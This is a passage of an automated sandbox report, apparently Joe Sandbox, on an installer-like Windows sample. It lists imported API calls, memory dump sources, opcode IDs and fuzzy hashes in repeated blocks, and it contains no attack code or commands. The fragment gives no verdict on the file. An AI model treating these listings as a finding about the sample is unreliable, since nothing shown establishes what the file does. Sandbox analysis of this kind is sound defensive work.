                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178667131.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_6684V5n83w.jbxd
                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                      • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                      • API String ID: 1599320355-0
                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 65b4e2bc04cdfc761cbb664ad7f9fd0a470a6c6464aa2ef3bfae8e7c7ff5a66d
                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 656afd6720eca978824560f17fb47cc17b19fb3a621816cfe3730d6e1c8eda21
                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 65b4e2bc04cdfc761cbb664ad7f9fd0a470a6c6464aa2ef3bfae8e7c7ff5a66d
                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DA017172644650EFE701ABB4ED4ABDA3BA4A725315F10C43AE645A61E3C678440A8B2D
                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00406ED2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                                                                                                                                                                                                                                                                                                      • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407239
                                                                                                                                                                                                                                                                                                                                      • lstrcmpW.KERNEL32(?,Version ), ref: 0040724A
                                                                                                                                                                                                                                                                                                                                      • lstrcpynW.KERNEL32(?,?,?), ref: 00407261
                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2178084641.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178056803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178119701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178667131.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_6684V5n83w.jbxd
                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                      • API ID: lstrcpyn$CreateFilelstrcmp
                                                                                                                                                                                                                                                                                                                                      • String ID: Version
                                                                                                                                                                                                                                                                                                                                      • API String ID: 512980652-315105994
                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 151640cc4cfa07bb85738859349229c9473c158da19ee21f10eacb3052f8d035
                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3EF03172A0021CABDB109AA5DD46EEA777CAB44700F100476F600F6191E6B59E158BA5
                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                      • DestroyWindow.USER32(00000000,00000000,00403703,00000001,?,?,?,00000000,00403A47,?), ref: 004032E5
                                                                                                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00403303
                                                                                                                                                                                                                                                                                                                                      • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A47,?), ref: 0040332E
                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2178084641.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178056803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178119701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178667131.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_6684V5n83w.jbxd
                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                      • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                      • API String ID: 2102729457-0
                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 401e6cecbc7a0b9e3d471fb50fe358663bd3ad25f9a7ebc527197863dd5a4904
                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 23F08230502620EBC221AF64FE5CBAB7F68FB04B82701447EF545F12A4CB7849928BDC
                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 00406370
                                                                                                                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 00406386
                                                                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 00406395
                                                                                                                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 0040639E
                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2178084641.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178056803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178119701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178667131.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_6684V5n83w.jbxd
                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                      • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                      • API String ID: 2883127279-0
                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 581917a1a4a7218ca9fbbc4554f9bfb31441e22884f00dccc1ee77d568dea7f2
                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 19E048712012107BE2101B669E8CD677EADDFCA7B6B05013EF695F51A0CE348C15D675
                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                      • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                                                                                                                                                                                                                                                                                      • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2178084641.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178056803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178119701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178667131.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_6684V5n83w.jbxd
                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                      • API ID: PrivateProfileStringlstrcmp
                                                                                                                                                                                                                                                                                                                                      • String ID: !N~
                                                                                                                                                                                                                                                                                                                                      • API String ID: 623250636-529124213
                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 7cd271610f6b1cb64eb4c57d825f56a096f62725fe87e34e9129affe44791136
                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 37E0E571500208ABDB00BBA0DE85DAE7BBCAF05304F14443AF641F71E3EA7459028718
                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00405C71
                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                      • Error launching installer, xrefs: 00405C48
                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2178084641.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178056803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178119701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178667131.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_6684V5n83w.jbxd
                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                      • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                                                                                                                                                      • String ID: Error launching installer
                                                                                                                                                                                                                                                                                                                                      • API String ID: 3712363035-66219284
                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                                                                                                                                                                                                                                                                                                                      • Instruction ID: c3c9ba135fb9cbcc5263534f4c07e322ce29f53e9eda4e03cc008bde6a4ec24c
                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 44E0EC70504209ABEF009B64EE49E7F7BBCEB00305F504575BD51E2561D774D9188A68
                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                                                                                                                                                                      • wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 004060E7: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2178084641.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178056803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178119701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178667131.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_6684V5n83w.jbxd
                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                      • API ID: CloseHandlelstrlenwvsprintf
                                                                                                                                                                                                                                                                                                                                      • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                                                                                                                                                                                      • API String ID: 3509786178-2769509956
                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 8d95e7b1bd6a8fe250904a0927f32055e446839aab417a06e937ad69edd5bb19
                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 04D05E34150316BACA009BA0DE09E997B64FBD0384F50442EF147C5070FA748001C70E
                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                                                                                                                                                                                                                                                                                                      • lstrcmpiA.KERNEL32(?,?), ref: 00405DDE
                                                                                                                                                                                                                                                                                                                                      • CharNextA.USER32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DEF
                                                                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2178084641.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178056803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178119701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178667131.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_6684V5n83w.jbxd
                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                      • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                      • API String ID: 190613189-0
                                                                                                                                                                                                                                                                                                                                      • Opcode ID: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 82a91399e33c41d3abe84131f59dcd741317d7299bce3ff9d06b8c6e92496674
                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D5F0CD31205988EFCB019FA9CD04C9FBBA8EF56350B2180AAE840E7310D630EE01DBA4